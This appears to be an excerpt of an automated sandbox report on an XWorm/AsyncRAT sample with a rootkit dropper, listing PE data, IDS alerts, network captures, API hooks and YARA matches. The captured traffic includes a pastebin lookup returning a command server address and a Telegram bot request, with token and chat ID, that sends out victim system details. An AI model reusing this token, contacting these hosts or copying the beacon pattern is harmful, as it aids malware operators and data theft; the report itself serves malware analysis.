                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x421740x57.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x4ce.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x460000xc.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x20000x401d40x402000f0ad1a44d58882aed587e4e81730f62False0.9713503594054581data7.986577451006427IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x440000x4ce0x60097fe92f1710620c82597ccb0684cb38fFalse0.3736979166666667data3.7224629505992812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x460000xc0x2000e49f11adc885d635a91fc5b658a7bcbFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_VERSION0x440a00x244data0.4706896551724138
                                                                                                                                RT_MANIFEST0x442e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                Network Behavior

                                                                                                                                Suricata IDS Alerts

                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-14T18:53:48.901505+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.849713149.154.167.220443TCP

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 14, 2024 18:53:05.484108925 CET4970680192.168.2.8208.95.112.1
                                                                                                                                Dec 14, 2024 18:53:05.717952013 CET8049706208.95.112.1192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:05.718074083 CET4970680192.168.2.8208.95.112.1
                                                                                                                                Dec 14, 2024 18:53:05.718446970 CET4970680192.168.2.8208.95.112.1
                                                                                                                                Dec 14, 2024 18:53:05.968172073 CET8049706208.95.112.1192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:06.891259909 CET8049706208.95.112.1192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:06.935940981 CET4970680192.168.2.8208.95.112.1
                                                                                                                                Dec 14, 2024 18:53:44.547848940 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:44.547914028 CET44349712104.20.4.235192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:44.548022985 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:44.561868906 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:44.561908960 CET44349712104.20.4.235192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:45.990319967 CET44349712104.20.4.235192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:45.990396976 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:45.993307114 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:45.993330956 CET44349712104.20.4.235192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:45.993613005 CET44349712104.20.4.235192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:46.044517994 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:46.065155029 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:46.107337952 CET44349712104.20.4.235192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:46.629992962 CET44349712104.20.4.235192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:46.630079985 CET44349712104.20.4.235192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:46.630141020 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:46.637672901 CET49712443192.168.2.8104.20.4.235
                                                                                                                                Dec 14, 2024 18:53:46.723735094 CET4970680192.168.2.8208.95.112.1
                                                                                                                                Dec 14, 2024 18:53:46.847148895 CET8049706208.95.112.1192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:46.847260952 CET4970680192.168.2.8208.95.112.1
                                                                                                                                Dec 14, 2024 18:53:46.867901087 CET49713443192.168.2.8149.154.167.220
                                                                                                                                Dec 14, 2024 18:53:46.867940903 CET44349713149.154.167.220192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:46.868041039 CET49713443192.168.2.8149.154.167.220
                                                                                                                                Dec 14, 2024 18:53:46.868441105 CET49713443192.168.2.8149.154.167.220
                                                                                                                                Dec 14, 2024 18:53:46.868453026 CET44349713149.154.167.220192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:48.273089886 CET44349713149.154.167.220192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:48.273178101 CET49713443192.168.2.8149.154.167.220
                                                                                                                                Dec 14, 2024 18:53:48.275974035 CET49713443192.168.2.8149.154.167.220
                                                                                                                                Dec 14, 2024 18:53:48.275986910 CET44349713149.154.167.220192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:48.276390076 CET44349713149.154.167.220192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:48.277602911 CET49713443192.168.2.8149.154.167.220
                                                                                                                                Dec 14, 2024 18:53:48.319344044 CET44349713149.154.167.220192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:48.901490927 CET44349713149.154.167.220192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:48.901576042 CET44349713149.154.167.220192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:48.901678085 CET49713443192.168.2.8149.154.167.220
                                                                                                                                Dec 14, 2024 18:53:48.928366899 CET49713443192.168.2.8149.154.167.220
                                                                                                                                Dec 14, 2024 18:53:53.019896984 CET4971637593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:53:53.139832973 CET3759349716115.69.183.222192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:53.140047073 CET4971637593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:53:53.175239086 CET4971637593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:53:53.295027971 CET3759349716115.69.183.222192.168.2.8
                                                                                                                                Dec 14, 2024 18:54:06.347419977 CET4971637593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:54:06.472956896 CET3759349716115.69.183.222192.168.2.8
                                                                                                                                Dec 14, 2024 18:54:15.043304920 CET3759349716115.69.183.222192.168.2.8
                                                                                                                                Dec 14, 2024 18:54:15.043384075 CET4971637593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:54:25.484091997 CET4971637593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:54:25.597511053 CET4971837593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:54:25.604228020 CET3759349716115.69.183.222192.168.2.8
                                                                                                                                Dec 14, 2024 18:54:25.717736959 CET3759349718115.69.183.222192.168.2.8
                                                                                                                                Dec 14, 2024 18:54:25.720304966 CET4971837593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:54:47.684566021 CET3759349718115.69.183.222192.168.2.8
                                                                                                                                Dec 14, 2024 18:54:47.685105085 CET4971837593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:55:27.552009106 CET4971837593192.168.2.8115.69.183.222
                                                                                                                                Dec 14, 2024 18:55:27.671818972 CET3759349718115.69.183.222192.168.2.8

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 14, 2024 18:53:05.336044073 CET5150853192.168.2.81.1.1.1
                                                                                                                                Dec 14, 2024 18:53:05.477273941 CET53515081.1.1.1192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:44.408323050 CET5043053192.168.2.81.1.1.1
                                                                                                                                Dec 14, 2024 18:53:44.546622038 CET53504301.1.1.1192.168.2.8
                                                                                                                                Dec 14, 2024 18:53:46.724368095 CET5512553192.168.2.81.1.1.1
                                                                                                                                Dec 14, 2024 18:53:46.867073059 CET53551251.1.1.1192.168.2.8

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 14, 2024 18:53:05.336044073 CET192.168.2.81.1.1.10xea7Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 14, 2024 18:53:44.408323050 CET192.168.2.81.1.1.10xa415Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 14, 2024 18:53:46.724368095 CET192.168.2.81.1.1.10xe351Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 14, 2024 18:53:05.477273941 CET1.1.1.1192.168.2.80xea7No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                Dec 14, 2024 18:53:44.546622038 CET1.1.1.1192.168.2.80xa415No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                Dec 14, 2024 18:53:44.546622038 CET1.1.1.1192.168.2.80xa415No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                Dec 14, 2024 18:53:44.546622038 CET1.1.1.1192.168.2.80xa415No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                Dec 14, 2024 18:53:46.867073059 CET1.1.1.1192.168.2.80xe351No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • pastebin.com
                                                                                                                                • api.telegram.org
                                                                                                                                • ip-api.com

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.849706208.95.112.1807424C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 14, 2024 18:53:05.718446970 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                Host: ip-api.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 14, 2024 18:53:06.891259909 CET175INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 14 Dec 2024 17:53:06 GMT
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                Content-Length: 6
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                X-Ttl: 60
                                                                                                                                X-Rl: 44
                                                                                                                                Data Raw: 66 61 6c 73 65 0a
                                                                                                                                Data Ascii: false


                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.849712104.20.4.2354437424C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-14 17:53:46 UTC74OUTGET /raw/Zx6DUkf9 HTTP/1.1
                                                                                                                                Host: pastebin.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-14 17:53:46 UTC391INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 14 Dec 2024 17:53:46 GMT
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                x-frame-options: DENY
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-xss-protection: 1;mode=block
                                                                                                                                cache-control: public, max-age=1801
                                                                                                                                CF-Cache-Status: EXPIRED
                                                                                                                                Last-Modified: Sat, 14 Dec 2024 17:53:46 GMT
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f200e2829108ca7-EWR
                                                                                                                                2024-12-14 17:53:46 UTC26INData Raw: 31 34 0d 0a 31 31 35 2e 36 39 2e 31 38 33 2e 32 32 32 3a 33 37 35 39 33 0d 0a
                                                                                                                                Data Ascii: 14115.69.183.222:37593
                                                                                                                                2024-12-14 17:53:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.849713149.154.167.2204437424C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-14 17:53:48 UTC446OUTGET /bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikka HTTP/1.1
                                                                                                                                Host: api.telegram.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-14 17:53:48 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Sat, 14 Dec 2024 17:53:48 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 56
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-14 17:53:48 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                                Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                                Code Manipulations

                                                                                                                                User Modules

                                                                                                                                Hook Summary

                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                                                                                                Processes

                                                                                                                                Process: explorer.exe, Module: ntdll.dll
                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                Process: winlogon.exe, Module: ntdll.dll
                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:12:53:00
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\RdLfpZY5A9.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\Desktop\RdLfpZY5A9.exe"
                                                                                                                                Imagebase:0x600000
                                                                                                                                File size:265'216 bytes
                                                                                                                                MD5 hash:28DB4677DCBBAA0A4C5ADBC02C9DA4F3
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:12:53:00
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\ProgramData\Install.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\ProgramData\Install.exe"
                                                                                                                                Imagebase:0x7c0000
                                                                                                                                File size:165'888 bytes
                                                                                                                                MD5 hash:B5F6C9AC3389F5E61B4C750CF950E27C
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: 00000002.00000000.1404083892.00000000007C2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: C:\ProgramData\Install.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 70%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:12:53:00
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\ProgramData\KrnlSetupSus.exe"
                                                                                                                                Imagebase:0xbc0000
                                                                                                                                File size:87'040 bytes
                                                                                                                                MD5 hash:6435792D63BE630506EB9EEBBD1E3878
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: ditekSHen
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:12:53:00
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
